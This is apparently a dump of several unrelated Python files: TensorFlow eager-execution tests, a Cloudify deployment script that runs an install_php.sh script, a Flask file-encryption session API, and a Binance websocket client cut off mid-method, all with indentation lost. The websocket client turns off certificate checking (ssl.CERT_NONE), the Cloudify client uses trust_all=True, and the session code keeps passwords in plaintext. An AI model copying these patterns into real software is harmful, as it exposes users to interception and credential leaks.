attrs=('transpose_a', True, 'transpose_b', False, 'T',
dtypes.int32.as_datatype_enum))[0]
self.assertAllEqual([[15]], product)
def testExecuteShapeAttr(self):
execute(
b'VarHandleOp',
num_outputs=1,
inputs=[],
attrs=('shape', [1, 2], 'dtype', dtypes.int32.as_datatype_enum,
'container', '', 'shared_name', ''))
def testExecuteShapeAttrBadValue(self):
with self.assertRaisesRegex(
errors.InvalidArgumentError,
'Expecting a Dimension for attr shape, got object'):
execute(
b'VarHandleOp',
num_outputs=1,
inputs=[],
attrs=('shape', [object()], 'dtype', dtypes.int32.as_datatype_enum,
'container', '', 'shared_name', ''))
def testExecuteListStringAttr(self):
execute(
b'TensorSummary',
num_outputs=1,
inputs=[constant_op.constant(3.0)],
attrs=('T', dtypes.float32.as_datatype_enum, 'description',
'tensor_summary', 'labels', ['3',
'summary'], 'display_name', 'test'))
def testExecuteListStringAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'TensorSummary',
num_outputs=1,
inputs=[constant_op.constant(3.0)],
attrs=('T', dtypes.float32.as_datatype_enum, 'description', '',
'labels', 3, 'display_name', 'test'))
def testExecuteListStringAttrBadListValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'TensorSummary',
num_outputs=1,
inputs=[constant_op.constant(3.0)],
attrs=('T', dtypes.float32.as_datatype_enum, 'description', '',
'labels', [3], 'display_name', 'test'))
def testExecuteListFloatAttr(self):
b = execute(
b'Bucketize',
num_outputs=1,
inputs=[constant_op.constant([3.0, 5.0, 7.0])],
attrs=('T', dtypes.float32.as_datatype_enum, 'boundaries', [4.0,
6.0]))[0]
self.assertAllEqual([0, 1, 2], b)
def testExecuteListFloatAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Bucketize',
num_outputs=1,
inputs=[constant_op.constant([3.0, 5.0, 7.0])],
attrs=('T', dtypes.float32.as_datatype_enum, 'boundaries', 4.0))
def testExecuteListFloatAttrBadListValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Bucketize',
num_outputs=1,
inputs=[constant_op.constant([3.0, 5.0, 7.0])],
attrs=('T', dtypes.float32.as_datatype_enum, 'boundaries',
['4.0', '6.0']))
def testExecuteListIntAttr(self):
b = execute(
b'Squeeze',
num_outputs=1,
inputs=[constant_op.constant([[[3.0]]])],
attrs=('T', dtypes.float32.as_datatype_enum, 'squeeze_dims', [0, 2]))[0]
self.assertAllEqual([3], b)
def testExecuteListIntAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Squeeze',
num_outputs=1,
inputs=[constant_op.constant([[[3.0]]])],
attrs=('T', dtypes.float32.as_datatype_enum, 'squeeze_dims', 0))
def testExecuteListIntAttrBadListValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Squeeze',
num_outputs=1,
inputs=[constant_op.constant([[[3.0]]])],
attrs=('T', dtypes.float32.as_datatype_enum, 'squeeze_dims',
['0', '2']))
def testExecuteListTypeListShapeAttr(self):
execute(
b'Barrier',
num_outputs=1,
inputs=[],
attrs=('component_types', [dtypes.float64.as_datatype_enum], 'shapes',
[[1, 2]], 'capacity', -1, 'container', '', 'shared_name', ''))
def testExecuteListTypeAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Barrier',
num_outputs=1,
inputs=[],
attrs=('component_types', dtypes.float64.as_datatype_enum, 'shapes',
[[1, 2]], 'capacity', -1, 'container', '', 'shared_name', ''))
def testExecuteListTypeAttrBadListValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Barrier',
num_outputs=1,
inputs=[],
attrs=('component_types', '1', 'shapes', [[1, 2]], 'capacity', -1,
'container', '', 'shared_name', ''))
def testExecuteListShapeAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Barrier',
num_outputs=1,
inputs=[],
attrs=('component_types', [dtypes.float64.as_datatype_enum], 'shapes',
[1, 2], 'capacity', -1, 'container', '', 'shared_name', ''))
def testExecuteListShapeAttrBadListValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Barrier',
num_outputs=1,
inputs=[],
attrs=('component_types', [dtypes.float64.as_datatype_enum], 'shapes',
[1], 'capacity', -1, 'container', '', 'shared_name', ''))
def testExecuteMultipleOutputs(self):
split_dim = 1
value = [[0, 1, 2], [3, 4, 5]]
x1, x2, x3 = execute(
b'Split',
num_outputs=3,
inputs=[constant_op.constant(split_dim),
constant_op.constant(value)],
attrs=('num_split', 3, 'T', dtypes.int32.as_datatype_enum))
self.assertAllEqual([[0], [3]], x1)
self.assertAllEqual([[1], [4]], x2)
self.assertAllEqual([[2], [5]], x3)
def testExecuteBadNumOutputsArgument(self):
with self.assertRaises(TypeError):
execute(
b'Relu', [],
inputs=[constant_op.constant(3.0)],
attrs=('T', dtypes.float32.as_datatype_enum))
@test_util.disable_tfrt('TFRT raises InternalError instead of NotFoundError')
def testExecuteUnknownOp(self):
with self.assertRaises(errors.NotFoundError):
execute(b'BlahBlahBlah', num_outputs=1, inputs=[], attrs=None)
def testExecuteUnknownAttr(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Identity',
num_outputs=1,
inputs=[constant_op.constant(3)],
attrs=('T', dtypes.int32.as_datatype_enum, 'unknown_attr', 'blah'))
def testComposition(self):
def add(x, y):
return execute(
b'Add',
num_outputs=1,
inputs=[x, y],
attrs=('T', dtypes.int32.as_datatype_enum))[0]
x = constant_op.constant(1)
three_x = add(add(x, x), x)
self.assertEqual(dtypes.int32, three_x.dtype)
self.assertAllEqual(3, three_x)
@test_util.run_gpu_only
def testOperationWithNoInputsRunsOnDevice(self):
shape = constant_op.constant([], dtype=dtypes.int32)
# x: Run the "TruncatedNormal" op CPU and copy result to GPU.
x = truncated_normal(shape).gpu()
# y: Explicitly run the "TruncatedNormal" op on GPU.
with context.device('gpu:0'):
y = truncated_normal(shape)
# Add would fail if x and y were not on the same device.
execute(
b'Add', 1, inputs=[x, y], attrs=('T', x.dtype.as_datatype_enum))
def testInvalidDevice(self):
with self.assertRaises(ValueError):
with context.device('pu:0'):
_ = constant_op.constant(1)
def testConvertMixedEagerTensors(self):
array = np.zeros((), dtype=np.float32)
tensor = constant_op.constant(0., dtype=dtypes.float32)
types, tensors = execute_lib.convert_to_mixed_eager_tensors(
[array, tensor], context.context())
for typ, t in zip(types, tensors):
self.assertEqual(typ, dtypes.float32)
self.assertIsInstance(t, ops.EagerTensor)
def testConvertMixedEagerTensorsWithVariables(self):
var = resource_variable_ops.ResourceVariable(1.0)
types, tensors = execute_lib.convert_to_mixed_eager_tensors(
['foo', var], context.context())
self.assertAllEqual([dtypes.string, dtypes.float32], types)
for t in tensors:
self.assertIsInstance(t, ops.EagerTensor)
# TODO(b/123637108): re-enable
@test_util.run_gpu_only
def disabled_testSmallIntegerOpsForcedToCPU(self):
a = constant_op.constant((1, 2, 3, 4, 5), dtype=dtypes.int64)
b = constant_op.constant((2, 3, 4, 5, 6), dtype=dtypes.int64)
with context.device('gpu:0'):
c = a + b
# Op forced to CPU since all constants are integers and small.
self.assertEndsWith(c.device, 'CPU:0')
a = array_ops.zeros((8, 10), dtype=dtypes.int64)
b = array_ops.ones((8, 10), dtype=dtypes.int64)
with context.device('gpu:0'):
c = a + b
# Op not forced to CPU since the tensors are larger than 64 elements.
self.assertEndsWith(c.device, 'GPU:0')
a = constant_op.constant((1, 2, 3, 4, 5), dtype=dtypes.float32)
b = constant_op.constant((2, 3, 4, 5, 6), dtype=dtypes.float32)
with context.device('gpu:0'):
c = a + b
# Op not forced to CPU since the constants are not integers.
self.assertEndsWith(c.device, 'GPU:0')
def testExecutionModeIsStoredThreadLocal(self):
cv = threading.Condition()
count = [0]
num_threads = 10
def execution_mode_test(cond, count, num_threads, ctx, mode):
cond.acquire()
# Ensure that all threads set their mode simultaneously
# Note that this is not a simple assignment, as the execution_mode is an
# @property with a custom setter.
ctx.execution_mode = mode
count[0] = count[0] + 1
if count[0] < num_threads:
cond.wait()
else:
cond.notify_all()
cond.release()
self.assertEqual(ctx.execution_mode, mode)
ctx = context.Context()
threads = []
for i in range(num_threads):
t = threading.Thread(
target=execution_mode_test,
args=(cv, count, num_threads, ctx,
context.SYNC if i % 2 == 0 else context.ASYNC))
t.start()
threads.append(t)
for t in threads:
t.join()
  @test_util.disable_tfrt('Does not support converting DT_RESOURCE '
                          'to op attr type yet.')
def testEmptyResourceReturned(self):
with ops.device('CPU:0'):
v = variables.Variable(1.)
empty_handle = array_ops.gather(
v.handle[array_ops.newaxis], array_ops.zeros([0], dtype=dtypes.int32))
self.assertEqual(
[0],
empty_handle.shape.as_list())
class SendRecvTest(test_util.TensorFlowTestCase):
cpu_device = '/job:localhost/replica:0/task:0/device:CPU:0'
def _send(self, tensor, tensor_name, to_device):
return execute(
b'_Send', num_outputs=0, inputs=[tensor],
attrs=('T', tensor.dtype.as_datatype_enum,
'tensor_name', tensor_name,
'send_device', tensor.device,
'send_device_incarnation', 0,
'recv_device', to_device,
'client_terminated', True))
def _recv(self, dtype, tensor_name, from_device):
device_name = context.context().device_name
if not device_name:
device_name = self.cpu_device
return execute(
b'_Recv', num_outputs=1, inputs=[],
attrs=('tensor_type', dtype.as_datatype_enum,
'tensor_name', tensor_name,
'send_device', from_device,
'send_device_incarnation', 0,
'recv_device', device_name,
'client_terminated', False))[0]
def setUp(self):
super(SendRecvTest, self).setUp()
context._reset_context()
configure_virtual_cpus()
@test_util.disable_tfrt('Send/Receive not supported in TFRT yet.')
def testBasic(self):
t0 = constant_op.constant(1.0)
t1 = constant_op.constant(2.0)
self._send(t0, 't0', self.cpu_device)
self._send(t1, 't1', self.cpu_device)
self.assertAllEqual(
self._recv(dtypes.float32, 't0', self.cpu_device),
1.0)
self.assertAllEqual(
self._recv(dtypes.float32, 't1', self.cpu_device),
2.0)
@test_util.run_gpu_only
@test_util.disable_tfrt('Send/Receive not supported in TFRT yet.')
def testLocalCrossDevice(self):
gpu_device_name = '/job:localhost/replica:0/task:0/device:GPU:0'
with ops.device('GPU:0'):
t0 = array_ops.identity(1.0)
self._send(t0, 't0', self.cpu_device)
with ops.device('cpu:0'):
self.assertAllEqual(
self._recv(dtypes.float32, 't0', gpu_device_name),
1.0)
self._send(constant_op.constant(2.0), 't1', gpu_device_name)
with ops.device('GPU:0'):
self.assertAllEqual(
self._recv(dtypes.float32, 't1', self.cpu_device),
2.0)
class EagerTensorCacheTest(test_util.TensorFlowTestCase):
def setUp(self):
super(EagerTensorCacheTest, self).setUp()
context._reset_context()
configure_virtual_cpus()
def testCacheSkipsTensorsTooLarge(self):
cache = context._EagerTensorCache(max_items=100, max_tensor_size=3)
cache.put('1', array_ops.zeros((2, 2)))
self.assertIsNone(cache.get('1'))
cache.put('2', array_ops.zeros((2)))
self.assertIsNotNone(cache.get('2'))
if __name__ == '__main__':
test.main()
|
_a4c_create.py
|
from cloudify import ctx
from cloudify.exceptions import NonRecoverableError
from cloudify.state import ctx_parameters as inputs
import subprocess
import os
import re
import sys
import time
import threading
import platform
from StringIO import StringIO
from cloudify_rest_client import CloudifyClient
from cloudify import utils
if 'MANAGER_REST_PROTOCOL' in os.environ and os.environ['MANAGER_REST_PROTOCOL'] == "https":
client = CloudifyClient(host=utils.get_manager_ip(), port=utils.get_manager_rest_service_port(), protocol='https', trust_all=True)
else:
client = CloudifyClient(host=utils.get_manager_ip(), port=utils.get_manager_rest_service_port())
def convert_env_value_to_string(envDict):
for key, value in envDict.items():
envDict[str(key)] = str(envDict.pop(key))
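# Illustrative example (not part of the original script): convert_env_value_to_string
# normalizes every key and value to str in place, e.g.
#   d = {'PORT': 8080, u'HOST': u'localhost'}
#   convert_env_value_to_string(d)   # d == {'PORT': '8080', 'HOST': 'localhost'}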
def get_attribute_user(ctx):
if get_attribute(ctx, 'user'):
return get_attribute(ctx, 'user')
else:
return get_attribute(ctx, 'cloudify_agent')['user']
def get_attribute_key(ctx):
if get_attribute(ctx, 'key'):
return get_attribute(ctx, 'key')
else:
return get_attribute(ctx, 'cloudify_agent')['key']
def get_host(entity):
if entity.instance.relationships:
for relationship in entity.instance.relationships:
if 'cloudify.relationships.contained_in' in relationship.type_hierarchy:
return relationship.target
return None
def has_attribute_mapping(entity, attribute_name):
    ctx.logger.info('Check if a mapping exists for attribute {0} in {1}'.format(attribute_name, entity.node.properties))
mapping_configuration = entity.node.properties.get('_a4c_att_' + attribute_name, None)
if mapping_configuration is not None:
if mapping_configuration['parameters'][0] == 'SELF' and mapping_configuration['parameters'][1] == attribute_name:
return False
else:
return True
return False
def process_attribute_mapping(entity, attribute_name, data_retriever_function):
# This is where attribute mapping is defined in the cloudify type
mapping_configuration = entity.node.properties['_a4c_att_' + attribute_name]
ctx.logger.info('Mapping configuration found for attribute {0} is {1}'.format(attribute_name, mapping_configuration))
    # If the mapping configuration exists and concerns SELF, just get the value of the mapped attribute name
    # Else if it concerns TARGET, follow the relationship and retrieve the mapped attribute name from the TARGET
if mapping_configuration['parameters'][0] == 'SELF':
return data_retriever_function(entity, mapping_configuration['parameters'][1])
elif mapping_configuration['parameters'][0] == 'TARGET' and entity.instance.relationships:
for relationship in entity.instance.relationships:
if mapping_configuration['parameters'][1] in relationship.type_hierarchy:
return data_retriever_function(relationship.target, mapping_configuration['parameters'][2])
return ""
def get_nested_attribute(entity, attribute_names):
deep_properties = get_attribute(entity, attribute_names[0])
attribute_names_iter = iter(attribute_names)
next(attribute_names_iter)
for attribute_name in attribute_names_iter:
if deep_properties is None:
return ""
else:
deep_properties = deep_properties.get(attribute_name, None)
return deep_properties
def _all_instances_get_nested_attribute(entity, attribute_names):
return None
def get_attribute(entity, attribute_name):
if has_attribute_mapping(entity, attribute_name):
# First check if any mapping exist for attribute
mapped_value = process_attribute_mapping(entity, attribute_name, get_attribute)
ctx.logger.info('Mapping exists for attribute {0} with value {1}'.format(attribute_name, mapped_value))
return mapped_value
    # No mapping exists, try to get the attribute directly from the entity
attribute_value = entity.instance.runtime_properties.get(attribute_name, None)
if attribute_value is not None:
ctx.logger.info('Found the attribute {0} with value {1} on the node {2}'.format(attribute_name, attribute_value, entity.node.id))
return attribute_value
# Attribute retrieval fails, fall back to property
property_value = entity.node.properties.get(attribute_name, None)
if property_value is not None:
return property_value
# Property retrieval fails, fall back to host instance
host = get_host(entity)
if host is not None:
        ctx.logger.info('Attribute {0} not found, go up to the parent node {1}'.format(attribute_name, host.node.id))
return get_attribute(host, attribute_name)
# Nothing is found
return ""
def _all_instances_get_attribute(entity, attribute_name):
result_map = {}
# get all instances data using cfy rest client
# we have to get the node using the rest client with node_instance.node_id
# then we will have the relationships
node = client.nodes.get(ctx.deployment.id, entity.node.id)
all_node_instances = client.node_instances.list(ctx.deployment.id, entity.node.id)
for node_instance in all_node_instances:
prop_value = __recursively_get_instance_data(node, node_instance, attribute_name)
if prop_value is not None:
ctx.logger.info('Found the property/attribute {0} with value {1} on the node {2} instance {3}'.format(attribute_name, prop_value, entity.node.id,
node_instance.id))
result_map[node_instance.id + '_'] = prop_value
return result_map
def get_property(entity, property_name):
# Try to get the property value on the node
property_value = entity.node.properties.get(property_name, None)
if property_value is not None:
ctx.logger.info('Found the property {0} with value {1} on the node {2}'.format(property_name, property_value, entity.node.id))
return property_value
# No property found on the node, fall back to the host
host = get_host(entity)
if host is not None:
        ctx.logger.info('Property {0} not found, go up to the parent node {1}'.format(property_name, host.node.id))
return get_property(host, property_name)
return ""
def get_instance_list(node_id):
result = ''
all_node_instances = client.node_instances.list(ctx.deployment.id, node_id)
for node_instance in all_node_instances:
if len(result) > 0:
result += ','
result += node_instance.id
return result
def get_host_node_name(instance):
for relationship in instance.relationships:
if 'cloudify.relationships.contained_in' in relationship.type_hierarchy:
return relationship.target.node.id
return None
def __get_relationship(node, target_name, relationship_type):
for relationship in node.relationships:
if relationship.get('target_id') == target_name and relationship_type in relationship.get('type_hierarchy'):
return relationship
return None
def __has_attribute_mapping(node, attribute_name):
    ctx.logger.info('Check if a mapping exists for attribute {0} in {1}'.format(attribute_name, node.properties))
mapping_configuration = node.properties.get('_a4c_att_' + attribute_name, None)
if mapping_configuration is not None:
if mapping_configuration['parameters'][0] == 'SELF' and mapping_configuration['parameters'][1] == attribute_name:
return False
else:
return True
return False
def __process_attribute_mapping(node, node_instance, attribute_name, data_retriever_function):
# This is where attribute mapping is defined in the cloudify type
mapping_configuration = node.properties['_a4c_att_' + attribute_name]
ctx.logger.info('Mapping configuration found for attribute {0} is {1}'.format(attribute_name, mapping_configuration))
    # If the mapping configuration exists and concerns SELF, just get the value of the mapped attribute name
    # Else if it concerns TARGET, follow the relationship and retrieve the mapped attribute name from the TARGET
if mapping_configuration['parameters'][0] == 'SELF':
return data_retriever_function(node, node_instance, mapping_configuration['parameters'][1])
elif mapping_configuration['parameters'][0] == 'TARGET' and node_instance.relationships:
for rel in node_instance.relationships:
relationship = __get_relationship(node, rel.get('target_name'), rel.get('type'))
if mapping_configuration['parameters'][1] in relationship.get('type_hierarchy'):
target_instance = client.node_instances.get(rel.get('target_id'))
target_node = client.nodes.get(ctx.deployment.id, target_instance.node_id)
return data_retriever_function(target_node, target_instance, mapping_configuration['parameters'][2])
return None
def __recursively_get_instance_data(node, node_instance, attribute_name):
if __has_attribute_mapping(node, attribute_name):
return __process_attribute_mapping(node, node_instance, attribute_name, __recursively_get_instance_data)
attribute_value = node_instance.runtime_properties.get(attribute_name, None)
if attribute_value is not None:
return attribute_value
elif node_instance.relationships:
for rel in node_instance.relationships:
# on rel we have target_name, target_id (instanceId), type
relationship = __get_relationship(node, rel.get('target_name'), rel.get('type'))
if 'cloudify.relationships.contained_in' in relationship.get('type_hierarchy'):
parent_instance = client.node_instances.get(rel.get('target_id'))
parent_node = client.nodes.get(ctx.deployment.id, parent_instance.node_id)
return __recursively_get_instance_data(parent_node, parent_instance, attribute_name)
return None
else:
return None
env_map = {}
env_map['NODE'] = ctx.node.id
env_map['INSTANCE'] = ctx.instance.id
env_map['INSTANCES'] = get_instance_list(ctx.node.id)
env_map['HOST'] = get_host_node_name(ctx.instance)
env_map['A4C_EXECUTION_HOST'] = get_attribute(ctx, 'ip_address')
env_map['A4C_EXECUTION_USER'] = get_attribute_user(ctx)
env_map['A4C_EXECUTION_KEY'] = get_attribute_key(ctx)
if inputs.get('process', None) is not None and inputs['process'].get('env', None) is not None:
ctx.logger.info('Operation is executed with environment variable {0}'.format(inputs['process']['env']))
env_map.update(inputs['process']['env'])
def parse_output(output):
# by convention, the last output is the result of the operation
last_output = None
outputs = {}
    pattern = re.compile(r'EXPECTED_OUTPUT_(\w+)=(.*)')
for line in output.splitlines():
match = pattern.match(line)
if match is None:
last_output = line
else:
output_name = match.group(1)
output_value = match.group(2)
outputs[output_name] = output_value
return {'last_output': last_output, 'outputs': outputs}
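# Illustrative example (hypothetical output names, not from the original): a
# wrapped script that prints
#   EXPECTED_OUTPUT_PHP_HOME=/opt/php
#   done
# yields parse_output(...) == {'last_output': 'done',
#                              'outputs': {'PHP_HOME': '/opt/php'}}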
def execute(script_path, process, outputNames, command_prefix=None, cwd=None):
os.chmod(script_path, 0755)
on_posix = 'posix' in sys.builtin_module_names
env = os.environ.copy()
process_env = process.get('env', {})
env.update(process_env)
if outputNames is not None:
env['EXPECTED_OUTPUTS'] = outputNames
if platform.system() == 'Windows':
wrapper_path = ctx.download_resource("scriptWrapper.bat")
else:
wrapper_path = ctx.download_resource("scriptWrapper.sh")
os.chmod(wrapper_path, 0755)
command = '{0} {1}'.format(wrapper_path, script_path)
else:
command = script_path
if command_prefix is not None:
command = "{0} {1}".format(command_prefix, command)
ctx.logger.info('Executing: {0} in env {1}'.format(command, env))
process = subprocess.Popen(command,
shell=True,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
env=env,
cwd=cwd,
bufsize=1,
close_fds=on_posix)
return_code = None
stdout_consumer = OutputConsumer(process.stdout)
stderr_consumer = OutputConsumer(process.stderr)
while True:
return_code = process.poll()
if return_code is not None:
break
time.sleep(0.1)
stdout_consumer.join()
stderr_consumer.join()
parsed_output = parse_output(stdout_consumer.buffer.getvalue())
if outputNames is not None:
outputNameList = outputNames.split(';')
for outputName in outputNameList:
            ctx.logger.info('Output name: {0} value: {1}'.format(outputName, parsed_output['outputs'].get(outputName, None)))
if return_code != 0:
error_message = "Script {0} encountered error with return code {1} and standard output {2}, error output {3}".format(command, return_code,
stdout_consumer.buffer.getvalue(),
stderr_consumer.buffer.getvalue())
error_message = str(unicode(error_message, errors='ignore'))
ctx.logger.error(error_message)
raise NonRecoverableError(error_message)
else:
ok_message = "Script {0} executed normally with standard output {1} and error output {2}".format(command, stdout_consumer.buffer.getvalue(),
stderr_consumer.buffer.getvalue())
ok_message = str(unicode(ok_message, errors='ignore'))
ctx.logger.info(ok_message)
return parsed_output
class OutputConsumer(object):
def __init__(self, out):
self.out = out
self.buffer = StringIO()
self.consumer = threading.Thread(target=self.consume_output)
self.consumer.daemon = True
self.consumer.start()
def consume_output(self):
for line in iter(self.out.readline, b''):
self.buffer.write(line)
self.out.close()
def join(self):
self.consumer.join()
new_script_process = {'env': env_map}
operationOutputNames = None
convert_env_value_to_string(new_script_process['env'])
parsed_output = execute(ctx.download_resource('_a4c_impl_artifact/PHP/tosca.interfaces.node.lifecycle.Standard/create/install_php.sh'), new_script_process, operationOutputNames)
outputs = parsed_output['outputs'].items()
for k,v in outputs:
ctx.logger.info('Output name: {0} value: {1}'.format(k, v))
ctx.instance.runtime_properties['_a4c_OO:tosca.interfaces.node.lifecycle.Standard:create:{0}'.format(k)] = v
ctx.instance.update()
|
session.py
|
import os
import json
import time
import logging
from threading import Lock, Timer
from uuid import uuid4
from multiprocessing import Process, Event
from flask import Blueprint, request
from .error import SessionNotInitialized, FileIsBeingEncrypted, FileIsBeingDecrypted, SessionExists
from .encrypter import FileEncrypter
from .util import *
MAX_SESSION_TIME = 60 * 60 # 1 hour
CHECK_INTERVAL = 60 * 10 # 10 minutes
bp = Blueprint('session', __name__, url_prefix='/api/session')
sessions = {}
sessions_lock = Lock()
def get_session(session_name):
with sessions_lock:
session = sessions.get(session_name, None)
if not session:
raise SessionNotInitialized
return session
def get_encrypt_job(session, file_id):
with session['lock']:
return session['encrypt_jobs'].get(file_id, None)
def add_encrypt_job(session, file_id, input_path, output_path):
encrypt_job = get_encrypt_job(session, file_id)
with session['lock']:
if encrypt_job:
encrypt_job[1].join()
event = Event()
def encrypt_file_wrapper():
try:
session['file_encrypter'].encrypt_file(input_path, output_path)
except Exception as e:
logging.error('failed to encrypt')
logging.error(e)
finally:
event.set()
os.remove(input_path)
encrypt_proc = Process(target=encrypt_file_wrapper)
encrypt_proc.start()
session['encrypt_jobs'][file_id] = (event, encrypt_proc)
def get_decrypt_job(session, file_id):
with session['lock']:
return session['decrypt_jobs'].get(file_id, None)
def add_decrypt_job(session, file_id, input_path, output_path):
decrypt_job = get_decrypt_job(session, file_id)
with session['lock']:
if decrypt_job:
decrypt_job[1].join()
event = Event()
def decrypt_file_wrapper():
try:
session['file_encrypter'].decrypt_file(input_path, output_path)
except Exception as e:
logging.error('failed to decrypt')
logging.error(e)
finally:
event.set()
decrypt_proc = Process(target=decrypt_file_wrapper)
decrypt_proc.start()
session['decrypted'].add(output_path)
session['decrypt_jobs'][file_id] = (event, decrypt_proc)
def check_file_locked(session, file_id):
encrypt_job = get_encrypt_job(session, file_id)
if encrypt_job and not encrypt_job[0].is_set():
raise FileIsBeingEncrypted
decrypt_job = get_decrypt_job(session, file_id)
if decrypt_job and not decrypt_job[0].is_set():
raise FileIsBeingDecrypted
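# Illustrative usage sketch (hypothetical names/paths, not part of the original
# module): callers are expected to guard a file before scheduling new work on it:
#   session = get_session('alice')
#   check_file_locked(session, 'file-1')   # raises if a job is still in flight
#   add_encrypt_job(session, 'file-1', '/tmp/plain.bin', '/tmp/cipher.bin')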
@bp.route('', methods=['POST'])
def sessions_endpoint():
if request.method == 'POST':
request_data = json.loads(request.data)
session_name = str(request_data['name'])
session = None
        try:
            session = get_session(session_name)
        except SessionNotInitialized:
            pass
if session and session['password'] == request_data['password']:
raise SessionExists
session = {
'file_encrypter': FileEncrypter(request_data['password'])
, 'name': session_name
, 'creation_time': time.time()
, 'encrypt_jobs': {}
, 'decrypt_jobs': {}
, 'decrypted': set()
, 'lock': Lock()
, 'password': request_data['password']
}
with sessions_lock:
sessions[session_name] = session
return {'status': 'success', 'session_name': session_name}, 201
@bp.route('<session_name>/refresh', methods=['PUT'])
def session_refresh_endpoint(session_name):
if request.method == 'PUT':
session = get_session(session_name)
session['creation_time'] = time.time()
        logging.info('Session Refreshed, Time Left: {} minutes'.format((MAX_SESSION_TIME - (time.time() - session['creation_time'])) / 60))
return { 'status': 'success' }, 200
@bp.route('<session_name>/valid', methods=['GET'])
def session_endpoint(session_name):
if request.method == 'GET':
session = get_session(session_name)
if not session:
return {
'active': False,
'reason': 'Session name {} not found'.format(session_name)
}, 404
if time.time() - session['creation_time'] < MAX_SESSION_TIME:
return {
'active': True,
}, 200
else:
return {
'active': False,
                'reason': 'Session {} timed out'.format(session_name)
}, 404
def create_session_clear_timer():
session_clear_timer = Timer(CHECK_INTERVAL, _clear_invalid_sessions)
session_clear_timer.name = 'ClearSessionThread'
session_clear_timer.start()
def _clear_decrypted(session):
dir_path = get_decrypted_folder(session['name'])
for f in os.listdir(dir_path):
os.remove(os.path.join(dir_path, f))
def _clear_invalid_sessions():
global sessions
logging.info('clearing invalid sessions')
with sessions_lock:
to_delete = []
for k, session in sessions.items():
if time.time() - session['creation_time'] >= MAX_SESSION_TIME:
to_delete.append(k)
for k in to_delete:
_clear_decrypted(sessions[k])
del sessions[k]
logging.info('cleared {} sessions'.format(len(to_delete)))
create_session_clear_timer()
|
websocketconnection.py
|
import threading
import websocket
import gzip
import ssl
import logging
from urllib import parse
import urllib.parse
from common.scripts.binance_spot.impl.utils.timeservice import get_current_timestamp
from common.scripts.binance_spot.impl.utils.urlparamsbuilder import UrlParamsBuilder
from common.scripts.binance_spot.impl.utils.apisignature import create_signature
from common.scripts.binance_spot.exception.binanceapiexception import BinanceApiException
from common.scripts.binance_spot.impl.utils import *
from common.scripts.binance_spot.base.printobject import *
from common.scripts.binance_spot.model.constant import *
# Key: ws, Value: connection
websocket_connection_handler = dict()
def on_message(ws, message):
websocket_connection = websocket_connection_handler[ws]
websocket_connection.on_message(message)
return
def on_error(ws, error):
websocket_connection = websocket_connection_handler[ws]
websocket_connection.on_failure(error)
def on_close(ws):
websocket_connection = websocket_connection_handler[ws]
websocket_connection.on_close()
def on_open(ws):
websocket_connection = websocket_connection_handler[ws]
websocket_connection.on_open(ws)
connection_id = 0
class ConnectionState:
IDLE = 0
CONNECTED = 1
CLOSED_ON_ERROR = 2
def websocket_func(*args):
connection_instance = args[0]
connection_instance.ws = websocket.WebSocketApp(connection_instance.url,
on_message=on_message,
on_error=on_error,
on_close=on_close)
global websocket_connection_handler
websocket_connection_handler[connection_instance.ws] = connection_instance
connection_instance.logger.info(
'[Sub][' + str(connection_instance.id) + '] Connecting...')
connection_instance.delay_in_second = -1
connection_instance.ws.on_open = on_open
connection_instance.ws.run_forever(sslopt={'cert_reqs': ssl.CERT_NONE})
connection_instance.logger.info(
'[Sub][' + str(connection_instance.id) + '] Connection event loop down')
if connection_instance.state == ConnectionState.CONNECTED:
connection_instance.state = ConnectionState.IDLE
class WebsocketConnection:
def __init__(self, api_key, secret_key, uri, watch_dog, request):
self.__thread = None
self.url = uri
self.__api_key = api_key
self.__secret_key = secret_key
self.request = request
self.__watch_dog = watch_dog
self.delay_in_second = -1
self.ws = None
self.last_receive_time = 0
self.logger = logging.getLogger('algo-trading')
self.state = ConnectionState.IDLE
global connection_id
connection_id += 1
self.id = connection_id
def in_delay_connection(self):
return self.delay_in_second != -1
def re_connect_in_delay(self, delay_in_second):
if self.ws is not None:
self.ws.close()
self.ws = None
self.delay_in_second = delay_in_second
        self.logger.warning('[Sub][' + str(self.id) + '] Reconnecting in '
                            + str(self.delay_in_second) + ' seconds')
def re_connect(self):
if self.delay_in_second != 0:
self.delay_in_second -= 1
            self.logger.warning('Reconnect pending, seconds remaining: ' +
                                str(self.delay_in_second))
else:
self.connect()
def connect(self):
if self.state == ConnectionState.CONNECTED:
self.logger.info('[Sub][' + str(self.id) + '] Already connected')
else:
self.__thread = threading.Thread(
target=websocket_func, args=[self])
self.__thread.start()
def send(self, data):
self.ws.send(data)
def close(self):
self.ws.close()
del websocket_connection_handler[self.ws]
self.__watch_dog.on_connection_closed(self)
self.logger.error('[Sub][' + str(self.id) + '] Closing normally')
def on_open(self, ws):
self.logger.info('[Sub][' + str(self.id) + '] Connected to server')
self.ws = ws
self.last_receive_time = get_current_timestamp()
self.state = ConnectionState.CONNECTED
self.__watch_dog.on_connection_created(self)
if self.request.subscription_handler is not None:
self.request.subscription_handler(self)
return
def on_error(self, error_message):
if self.request.error_handler is not None:
print('error')
exception = BinanceApiException(
BinanceApiException.SUBSCRIPTION_ERROR, error_message)
self.request.error_handler(exception)
self.logger.error('[Sub][' + str(self.id) + '] ' + str(error_message))
def on_failure(self, error):
print('on_failure')
self.on_error('Unexpected error: ' + str(error))
self.close_on_error()
def on_message(self, message):
self.last_receive_time = get_current_timestamp()
json_wrapper = parse_json_from_string(message)
if json_wrapper.contain_key('status') and json_wrapper.get_string('status') != 'ok':
error_code = json_wrapper.get_string_or_default(
'err-code', 'Unknown error')
error_msg = json_wrapper.get_string_or_default(
'err-msg', 'Unknown error')
self.on_error(error_code + ': ' + error_msg)
elif json_wrapper.contain_key('err-code') and json_wrapper.get_int('err-code') != 0:
error_code = json_wrapper.get_string_or_default(
'err-code', 'Unknown error')
